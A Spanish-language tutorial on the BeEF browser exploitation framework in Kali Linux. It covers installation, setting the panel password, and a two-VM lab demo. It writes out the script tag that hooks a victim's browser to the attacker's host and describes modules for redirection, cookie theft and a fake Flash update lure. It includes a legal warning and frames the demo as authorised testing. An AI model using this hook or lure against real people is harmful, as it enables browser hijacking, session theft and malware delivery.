hacking kali linux beef-xss
hacking kali linux beef-xss
BeEF (The Browser Exploitation Framework) es una herramienta de pruebas de penetración muy potente que se centra en el lado del cliente, específicamente en los navegadores web. A diferencia de otras herramientas que buscan vulnerabilidades en el servidor, BeEF utiliza el navegador como una puerta de entrada para evaluar el entorno de seguridad de un objetivo.
Aquí tienes una guía básica para entender cómo funciona y cómo ponerlo en marcha en Kali Linux.
1. ¿Qué es BeEF?
BeEF permite a un "penn-tester" (o atacante) "enganchar" (hook) un navegador web. Una vez que la víctima visita una página infectada, el atacante puede ejecutar comandos en el navegador de esa persona para:
Redirigir el navegador a otros sitios.
Robar cookies y datos de sesión.
Obtener información del sistema operativo y hardware.
Realizar ataques de ingeniería social (como mostrar ventanas falsas de inicio de sesión).
2. Instalación en Kali Linux
Aunque suele venir preinstalado en las versiones "Large" de Kali, puedes instalarlo fácilmente desde la terminal:
Actualiza tu sistema:
sudo apt update && sudo apt upgrade
Instala BeEF:
sudo apt install beef-xss
3. Configuración Inicial (Muy Importante)
Por seguridad, BeEF no arrancará si no cambias la contraseña por defecto.
Abre el archivo de configuración:
sudo nano /etc/beef-xss/config.yaml
Busca la sección de
credentialsy cambia el valor depasswd(por defecto esbeef).Guarda los cambios (
Ctrl + O,Enter) y sal (Ctrl + X).
4. Cómo iniciar y usar BeEF
Para iniciar el servicio, simplemente escribe en tu terminal:
sudo beef-xss
Una vez iniciado, verás dos enlaces clave en la terminal:
UI URL (Panel de Control): Generalmente
http://127.0.0.1:3000/ui/panel. Aquí es donde controlas a los navegadores "enganchados".Hook URL (El Gancho): Generalmente
<tu-ip>:3000/hook.js. Este es el script que debe ejecutarse en el navegador de la víctima.
El proceso de ataque:
Infectar la página: Debes lograr que el navegador de la víctima cargue el script. Se hace insertando esta línea en un archivo HTML:
<script src="http://<tu-ip>:3000/hook.js"></script>
Panel de Control: En cuanto la víctima entra a esa web, verás que aparece su IP en el panel de la izquierda en BeEF.
Ejecución de Comandos: Selecciona el navegador "online" y ve a la pestaña "Commands". Verás cientos de módulos organizados por colores (verde significa que es invisible para el usuario y funciona bien).
Advertencia Ética y Legal
Usa esta herramienta solo en entornos controlados (como máquinas virtuales) o bajo consentimiento explícito. El uso de BeEF para acceder a sistemas ajenos sin permiso es ilegal.
Nota: BeEF es una herramienta de XSS (Cross-Site Scripting). Para que sea efectiva en la vida real, suele combinarse con ataques de red (como Man-in-the-Middle) o páginas web vulnerables donde puedas inyectar el script.
Para realizar esta demostración de forma segura, lo ideal es que utilices dos máquinas virtuales (VMs) conectadas a la misma red (usando el modo "Adaptador Puente" o "Red NAT" en VirtualBox/VMware).
Máquina A (Atacante): Kali Linux con BeEF.
Máquina B (Víctima): Cualquier sistema (Windows, Linux, Android) con un navegador web (Chrome, Firefox).
Paso 1: Preparar el "Gancho" (Hook)
En tu Kali Linux, necesitamos una página web que contenga el script de BeEF. Por defecto, BeEF trae una página de prueba, pero vamos a hacerlo más realista.
Asegúrate de que BeEF esté corriendo:
sudo beef-xss.Anota tu IP local. En una terminal nueva escribe:
ip addr. (Supongamos que es192.168.1.50).BeEF ya incluye un servidor web, pero para esta prueba usaremos la página de demostración que viene por defecto:
http://192.168.1.50:3000/demos/basic.html
Paso 2: El Momento de la "Infección"
Ahora, ve a la Máquina Víctima y abre el navegador.
Introduce la URL de la demo:
http://192.168.1.50:3000/demos/basic.html.Verás una página web sencilla. No la cierres. Mientras esa pestaña esté abierta, tú tienes el control.
Paso 3: Tomar el Control desde Kali
Vuelve a tu Panel de Control de BeEF en Kali (http://127.0.0.1:3000/ui/panel).
En la columna de la izquierda (Online Browsers), verás aparecer la IP de la víctima.
Haz clic sobre ella. Se abrirá un panel con pestañas a la derecha.
Ve a la pestaña Commands. Aquí es donde ocurre la magia.
Paso 4: Tres Pruebas Prácticas para Ejecutar
A. Crear una Alerta (Prueba de conexión)
Es la forma más simple de verificar que tienes el control.
Busca en el árbol de comandos: Browser -> Window -> Alert Dialog.
En el campo "Alert text", escribe: "Has sido auditado por seguridad".
Haz clic en Execute (abajo a la derecha).
Resultado: Verás aparecer el mensaje instantáneamente en el navegador de la víctima.
B. Redirección de Google (Phishing)
Puedes forzar a la víctima a ir a una página maliciosa.
Busca: Browser -> Redirect Browser.
En "Redirect URL", pon:
https://google.com.Haz clic en Execute.
Resultado: El navegador de la víctima cambiará de página automáticamente.
C. Fake Flash Update (Ingeniería Social) - El más potente
Este módulo intenta engañar al usuario para que descargue un archivo (que podría ser un virus real).
Busca: Social Engineering -> Fake Flash Update.
Configura la URL de descarga (puedes dejar la de BeEF por defecto).
Haz clic en Execute.
Resultado: Al usuario le aparecerá una barra en la parte superior del navegador diciendo que su plugin de Flash está desactualizado, con un diseño muy convincente.
¿Cómo analizar los resultados?
Cada vez que ejecutas un comando, en la columna central de la pestaña "Commands" aparecerá una lista de ejecuciones. Si haces clic en una, verás el "Command Results", donde BeEF te muestra qué respondió el navegador o si hubo algún error.